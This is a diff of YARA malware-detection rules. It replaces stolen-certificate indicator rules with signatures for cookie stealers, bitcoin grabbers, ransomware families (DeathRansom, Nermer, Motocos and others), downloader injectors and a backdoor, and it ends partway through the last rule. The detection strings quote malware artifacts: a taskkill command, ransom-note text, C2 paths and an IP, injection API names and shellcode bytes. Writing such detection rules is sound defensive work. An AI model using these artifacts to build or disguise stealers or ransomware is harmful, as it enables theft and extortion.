+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) or 1 of ( $z* ) ) and ( 4 of ( $s* ) ) or ( 6 of ( $s* ) ) or ( #z1 > 4 and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B649A966410F62999C939384Af553919 : FILE
+rule DITEKSHEN_MALWARE_Win_Cookiestealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects generic cookie stealer"
 		author = "ditekSHen"
-		id = "6b88b712-6d25-5152-80bf-562bf82f336c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "64c6c59d-4046-5949-bf71-22a5f6bfa209"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1611-L1622"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5841-L5857"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "231b0aa0a1e7c72552d683cc4f93b39444f7c1ebb3bb719bee224aa62e9a28dd"
+		logic_hash = "9cc406ae078e37430b3cf10954c02014b9760bc887344842e724df735d1d9808"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a0c6cd25e1990c0d03b6ec1ad5a140f2c8014a8c2f1f4f227ee2597df91a8b6c"
-		importance = 20
+
+	strings:
+		$s1 = "([\\S]+?)=([^;|^\\r|^\\n]+)" fullword ascii
+		$s2 = "(.+?): ([^;|^\\r|^\\n]+)" fullword ascii
+		$s3 = "Set-Cookie: ([^\\r|^\\n]+)" fullword ascii
+		$s4 = "cmd.exe /c taskkill /f /im chrome.exe" fullword ascii
+		$s5 = "FIREFOX.EXE|Google Chrome|IEXPLORE.EXE" ascii
+		$pdb1 = "F:\\facebook_svn\\trunk\\database\\Release\\DiskScan.pdb" fullword ascii
+		$pdb2 = "D:\\Projects\\crxinstall\\trunk\\Release\\spoofpref.pdb" fullword ascii
+		$ua1 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" fullword ascii
+		$ua2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.A.T. SARL" and pe.signatures [ i ] . serial == "00:b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $pdb* ) and 1 of ( $ua* ) ) or ( all of ( $ua* ) and 1 of ( $pdb* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_22367Dbefd0A325C3893Af52547B14Fa : FILE
+rule DITEKSHEN_MALWARE_Win_Bitcoingrabber : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects generic bitcoin stealer"
 		author = "ditekSHen"
-		id = "301f126d-1ff6-5512-a38b-ca1dd7d67765"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f73b58da-1db5-5767-ae0a-074648e30966"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1624-L1635"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5859-L5875"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7b717a86ba0a6c3c8ba59c7b7c97dae802c351340ad67a9baf3f526b084e995a"
+		logic_hash = "2dc762525c1fbf25517df52f0561d96d7469bf1367eada31c236fc313001c6cb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b5cb5b256e47a30504392c37991e4efc4ce838fde4ad8df47456d30b417e6d5c"
-		importance = 20
+
+	strings:
+		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s2 = "Bitcoin-Grabber" ascii
+		$s3 = "Bitcoin_Grabber" ascii
+		$s4 = "encrypt resources [compress]T" fullword ascii
+		$s5 = "code control flow obfuscationT" fullword ascii
+		$s6 = "\\Users\\lakol\\Desktop\\a\\Crypto Currency Wallet Changer\\" ascii
+		$pat1 = "\\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,35}\\b" fullword wide
+		$pat2 = "\\b0x[a-fA-F0-9]{40}\\b" fullword wide
+		$pat3 = "\\b4([0-9]|[A-B])(.){93}\\b" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.lux Software LLC" and pe.signatures [ i ] . serial == "22:36:7d:be:fd:0a:32:5c:38:93:af:52:54:7b:14:fa" )
+		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $pat* ) and 2 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E04A344B397F752A45B128A594A3D6B5 : FILE
+rule DITEKSHEN_MALWARE_Win_FOXGRABBER : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects FOXGRABBER utility"
 		author = "ditekSHen"
-		id = "85a7c3f7-a449-54ad-aac4-53f2a2c6c30e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b98e501c-e9c6-5fcc-bfa0-9475ce32864c"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1637-L1648"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5877-L5890"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "db3c854b68387aa5c6976783e6f79f99fe3389344b64d38c603d298128193e12"
+		logic_hash = "5ecba516f1155bdcccf83b0a034b11d8eac8619d4c3326fdbc76082fbe4daf02"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d73229f3b7c2025a5a56e6e189be8a9120f1b3b0d8a78b7f62eff5c8d2293330"
-		importance = 20
+
+	strings:
+		$s1 = "start grabbing" wide
+		$s2 = "end grabbing in" wide
+		$s3 = "error of copying files from comp:" wide
+		$s4 = "\\Firefox\\" wide nocase
+		$pdb1 = "\\obj\\Debug\\grabff.pdb" ascii
+		$pdb2 = "\\obj\\Release\\grabff.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Highweb Ireland Operations Limited" and pe.signatures [ i ] . serial == "00:e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00A7989F8Be0C82D35A19E7B3Dd4Be30E5 : FILE
+rule DITEKSHEN_MALWARE_Win_Browsergrabber : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for FOXGRABBER-like samples but for various browsers"
 		author = "ditekSHen"
-		id = "0bb81ddc-b63b-534b-852f-7b0a2feeef9e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a50a60cf-5ab8-5e4e-be00-aa0306f4d84f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1650-L1661"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5892-L5906"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "66d600d97b5aca1aa9a302671f06aef0d5c4ae9829d6cb16f191bd4c59462d2e"
+		logic_hash = "c96a63566280758d8c32542bfab3c6faa7d21329430345f51ea4c2f0a6809dc2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3e93aadb509b542c065801f04cffb34956f84ee8c322d65c7ae8e23d27fe5fbf"
-		importance = 20
+
+	strings:
+		$s1 = "start grabbing" wide
+		$s2 = "end grabbing in" wide
+		$s3 = "error of copying files from comp:" wide
+		$s4 = /(Chrome|Edge)/ wide
+		$ff = "\\Firefox\\" wide nocase
+		$pdb1 = "\\obj\\Debug\\grab" ascii
+		$pdb2 = "\\obj\\Release\\grab" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Instamix Limited" and pe.signatures [ i ] . serial == "00:a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" )
+		uint16( 0 ) == 0x5a4d and not ( $ff ) and ( all of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_39F56251Df2088223Cc03494084E6081 : FILE
+rule DITEKSHEN_MALWARE_Win_Deathransom : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known DeathRansom ransomware"
 		author = "ditekSHen"
-		id = "4b5c27e0-0b3e-52e6-a867-1c2adadf3af3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a6eeb607-8b5c-5982-8b5a-aa2b3c6a65e6"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1663-L1674"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5908-L5925"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dc757f831b2537f12151f4f9e886ccf83bacfbcaea3ce12b2199f13ae00b199e"
+		logic_hash = "3c87364a7ecc403262056eeccaa16bf230fbbe684e21d35099d0d572abba9eda"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "66f32cf78b8f685a2c6f5bf361c9b0f9a9678de11a8e7931e2205d0ef65af05c"
-		importance = 20
+
+	strings:
+		$s1 = "%s %f %c" fullword ascii
+		$pdb1 = ":\\wud.pdb" ascii
+		$spdb2 = "\\crypt_server\\runtime\\crypt" ascii
+		$spdb3 = "\\bin\\nuvin.pdb" ascii
+		$h1 = "#Dunubeyokunov" wide
+		$h2 = "^Neyot dehipijakeyelih" wide
+		$h3 = "talin%Sanovurenofibiw" wide
+		$h4 = "WriteFile" fullword ascii
+		$h5 = "ClearEventLogA" fullword ascii
+		$h6 = "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Med Pty. Ltd." and pe.signatures [ i ] . serial == "39:f5:62:51:df:20:88:22:3c:c0:34:94:08:4e:60:81" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $pdb* ) or ( all of ( $s* ) and 1 of ( $pdb* ) ) or 5 of ( $h* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_009Cfbb4C69008821Aaacecde97Ee149Ab : FILE
+rule DITEKSHEN_MALWARE_Win_Unlockyourfiles : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects UnlockYourFiles ransomware"
 		author = "ditekSHen"
-		id = "0b0d815b-2232-5159-9b78-9227d9b2ec11"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "265f2a48-143a-56c9-9cd4-b5137799a9e8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1676-L1687"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5927-L5946"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "de04f12b1fb1e12860bf4ac077b700d180b8d412890922b75264319559fbd997"
+		logic_hash = "05f549467fac03d4aa2248a9c6c87e4c4273ed6ad727ebb77a4dd115032e454b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6c7e917a2cc2b2228d6d4a0556bda6b2db9f06691749d2715af9a6a283ec987b"
-		importance = 20
+
+	strings:
+		$s1 = "filesx0" wide
+		$s2 = "_auto_file" wide
+		$s3 = "<EncyptedKey>" fullword wide
+		$s4 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\" wide
+		$s5 = "DecryptAllFile" fullword ascii
+		$s6 = "AES_Only_Decrypt_File" fullword ascii
+		$m1 = "Free files decrypted" wide
+		$m2 = "Restore my files" wide
+		$m3 = "Type tour password..." wide
+		$m4 = "files encrypted by strong password" ascii
+		$m5 = "buy bitcoin" ascii
+		$m6 = "Unlock File" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kivaliz Prest s.r.l." and pe.signatures [ i ] . serial == "00:9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 5 of ( $m* ) or ( 2 of ( $s* ) and 2 of ( $m* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_008Cff807Edaf368A60E4106906D8Df319 : FILE
+rule DITEKSHEN_MALWARE_Win_Decryptmyfiles : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DecryptMyFiles ransomware"
 		author = "ditekSHen"
-		id = "ad8bed7f-3bc6-53d3-9e7a-0868e2ad267a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "dab518f2-3fac-5492-88fb-35cd0000ec47"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1689-L1700"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5948-L5964"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48752aff88cd3d546757a4220a64ca17cc9a5f00a42d2bc0571dedf5de769bc2"
+		logic_hash = "5b7f74569700e2ad3f31388571dad5ffda45f5ab3dd36806f7514aff0367d5ba"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "c97d809c73f376cdf8062329b357b16c9da9d14261895cd52400f845a2d6bdb1"
-		importance = 20
+
+	strings:
+		$s1 = "FILES ENCRYPTED" wide
+		$s2 = "pexplorer.exe" fullword wide
+		$s3 = "uniquesession" fullword ascii
+		$s4 = ".[decryptmyfiles.top]." fullword ascii
+		$s5 = "decrypt 1 file" ascii
+		$s6 = "(databases,backups, large excel" ascii
+		$c1 = "api/connect.php" ascii
+		$c2 = "decryptmyfiles.top" ascii
+		$c3 = "/contact/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KRAFT BOKS OOO" and pe.signatures [ i ] . serial == "00:8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or all of ( $c* ) or ( 2 of ( $c* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2924785Fd7990B2D510675176Dae2Bed : FILE
+rule DITEKSHEN_MALWARE_Win_Motocos : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Motocos ransomware"
 		author = "ditekSHen"
-		id = "2aedb37c-8991-5750-b0c6-b9d6e7bb5e79"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "be7284be-b57d-5a2c-9a84-37d76445cd0d"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1702-L1713"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5966-L5981"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dbdd714575d3c5f9554026fea97c6e91073d30cf728396111a5106303bb7b624"
+		logic_hash = "99ac365c277058503874313e3a74ab016d6d279b47c754c3df950e3ce60e29f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "adbc44fda783b5fa817f66147d911fb81a0e2032a1c1527d1b3adbe55f9d682d"
-		importance = 20
+
+	strings:
+		$s1 = "Block Investigation Tools" wide
+		$s2 = "powershell.exe,taskmgr.exe,procexp.exe,procmon.exe" wide
+		$s3 = "google.com,youtube.com,baidu.com,facebook.com,amazon.com,360.cn,yahoo.com,wikipedia.org,zoom.us,live.com,reddit.com,netflix.com,microsoft.com,instagram.com,vk.com," wide
+		$s4 = "START ----" wide
+		$s5 = "TEngine.Clear_EventLog_Result" wide
+		$s6 = "TEngine.EncryptLockFiles" wide
+		$s7 = "TEngine.CleanShadowFiles" wide
+		$s8 = "TDNSUtils.SendCommand" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Neoopt LLC" and pe.signatures [ i ] . serial == "29:24:78:5f:d7:99:0b:2d:51:06:75:17:6d:ae:2b:ed" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_F2C4B99487Ed33396D77029B477494Bc : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent12 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader agent"
 		author = "ditekSHen"
-		id = "594a5def-2516-5639-a72b-9b84b65de1e0"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "841b998b-99d1-50d8-bc7b-75b2a8e690bf"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1715-L1726"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5983-L5993"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "109d71674b652a2f42bb2a45c877d3a6cbfe280d0324f9ac8fa746d322440694"
+		logic_hash = "b9845414f4ce4cc25b75a8de7569c4135bbb7ba9098fd4c50d7ac80302e99b8f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f38abffd259919d68969b8b2d265afac503a53dd"
-		importance = 20
+
+	strings:
+		$s1 = "WebClient" fullword ascii
+		$s2 = "DownloadData" fullword ascii
+		$s3 = "packet_server" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bedaabaefadfdfedcbbbebaaef" and pe.signatures [ i ] . serial == "f2:c4:b9:94:87:ed:33:39:6d:77:02:9b:47:74:94:bc" )
+		uint16( 0 ) == 0x5a4d and all of them and filesize < 50KB
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C54Cccff8Acceb9654B6F585E2442Ef7 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects specific downloader injector shellcode"
 		author = "ditekSHen"
-		id = "c199b65f-5e95-5c6a-8ccc-7f343b867885"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c5e0946c-3e15-5ebc-b1b5-3f00566dc5cd"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1728-L1739"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5995-L6015"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4be5e0f9f522f0d4096a63b001a02ea130ef56149dec7f0ac90be686b885cc4a"
+		logic_hash = "5c13af5fdbb2e8a27103d9502126a82d0bff15d9a269b22e4279b5b459d50e2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "416c79fccc5f42260cd227fd831b001aca14bf0d"
-		importance = 20
+
+	strings:
+		$s1 = "process call create \"%s\"" ascii wide
+		$s2 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\" ascii wide
+		$s3 = "%systemroot%\\system32\\ntdll.dll" ascii wide
+		$s4 = "qemu-ga.exe" ascii wide
+		$s5 = "prl_tools.exe" ascii wide
+		$s6 = "vboxservice.exe" ascii wide
+		$o1 = { 75 04 74 02 38 6e 8b 34 24 83 c4 04 eb 0a 08 81 }
+		$o2 = { 16 f8 f7 ba f0 3d 87 c7 95 13 b7 64 22 be e1 59 }
+		$o3 = { 8b 0c 24 83 c4 04 eb 05 ea f2 eb ef 05 e8 ad fe }
+		$o4 = { eb 05 1d 51 eb f5 ce e8 80 fd ff ff 77 a1 f4 cd }
+		$o5 = { eb 05 6e 33 eb f5 73 e8 64 f6 ff ff 77 a1 f4 77 }
+		$o6 = { 59 eb 05 fd 98 eb f4 50 e8 d5 f5 ff ff 3b b9 00 }
+		$o7 = "bYkoDA7G" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eadbebdebcc" and pe.signatures [ i ] . serial == "c5:4c:cc:ff:8a:cc:eb:96:54:b6:f5:85:e2:44:2e:f7" )
+		( uint16( 0 ) == 0x5a4d and all of ( $o* ) ) or ( all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_690910Dc89D7857C3500Fb74Bed2B08D : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader injector"
 		author = "ditekSHen"
-		id = "d10931e2-8abb-592b-a070-3767f286bd74"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ce2c418d-18e4-579c-9828-94e294385846"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1741-L1752"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6017-L6034"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62a1be8435f73f3768030feb6b5917d9a8075e7abac52e654231ba9d16ccc374"
+		logic_hash = "76d185cfcbc7f4996c2fb5c7c1ba4eb20b32d322d8ff47594283a4ca3e573a0b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "dfeb986812ba9f2af6d4ff94c5d1128fa50787951c07b4088f099a5701f1a1a4"
-		importance = 20
+
+	strings:
+		$x1 = "In$J$ct0r" fullword wide
+		$x2 = "%InJ%ector%" fullword wide
+		$a1 = "WriteProcessMemory" fullword wide
+		$a2 = "URLDownloadToFileA" fullword ascii
+		$a3 = "Wow64SetThreadContext" fullword wide
+		$a4 = "VirtualAllocEx" fullword wide
+		$s1 = "RunPE" fullword wide
+		$s2 = "SETTINGS" fullword wide
+		$s3 = "net.pipe" fullword wide
+		$s4 = "vsmacros" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OLIMP STROI" and pe.signatures [ i ] . serial == "69:09:10:dc:89:d7:85:7c:35:00:fb:74:be:d2:b0:8d" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( all of ( $a* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Af9B523180F34A24Fcfd11B74E7D6Cd : FILE
+rule DITEKSHEN_MALWARE_Win_Nermer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Nermer ransomware"
 		author = "ditekSHen"
-		id = "d9ef3746-8b8e-5259-bcc4-408e27bc8ce3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "fce4f178-8e98-53b0-ae09-2ce876ad524e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1754-L1765"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6036-L6062"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e06c87bddfc4fbb8918b7b1d64ec66b810a5a0c635c34d820b33c3cf9789229c"
+		logic_hash = "e885b1b908b256ee07f5cb144d63f5ad65e5bf746b70efe168b0ac742a246ab3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c8aec622951068734d754dc2efd7032f9ac572e26081ac38b8ceb333ccc165c9"
-		importance = 20
+
+	strings:
+		$x1 = "gPROTECT_INFO.TXT" fullword wide
+		$x2 = ".nermer" fullword wide
+		$s1 = "db_journal" fullword wide
+		$s2 = "quicken2015backup" fullword wide
+		$s3 = "mysql" fullword wide
+		$s4 = "sas7bdat" fullword wide
+		$s5 = "httpd.exe" fullword wide
+		$s6 = "Intuit.QuickBooks.FCS" fullword wide
+		$s7 = "convimage" fullword wide
+		$s8 = ".?AV?$_Binder@U_Unforced@std@@P8shares_t@" ascii
+		$s9 = "BgIAAACkAABSU0ExAAgAAAEAAQCt" ascii
+		$m1 = "YOUR FILES WERE ENCRYPTED" ascii
+		$m2 = "MARKED BY EXTENSION .nermer" ascii
+		$m3 = "send us your id: >> {id} <<" ascii
+		$m4 = "email us: >> {email} <<" ascii
+		$c1 = "/repeater.php" ascii
+		$c2 = "HTTPClient/0.1" fullword ascii
+		$c3 = "94.156.35.227" ascii
+		$c4 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORBIS LTD" and pe.signatures [ i ] . serial == "0a:f9:b5:23:18:0f:34:a2:4f:cf:d1:1b:74:e7:d6:cd" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $m* ) or all of ( $c* ) or all of ( $s* ) or ( 4 of ( $s* ) and ( 1 of ( $x* ) or 1 of ( $m* ) or 2 of ( $c* ) ) ) or 14 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00F4D2Def53Bccb0Dd2B7D54E4853A2Fc5 : FILE
+rule DITEKSHEN_MALWARE_Win_Beastdoor : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Beastdoor backdoor"
 		author = "ditekSHen"
-		id = "8c1970b7-10b5-5976-a89c-a0d30f4b04af"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b271d53e-2693-5a93-825a-ef32f72a4b01"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
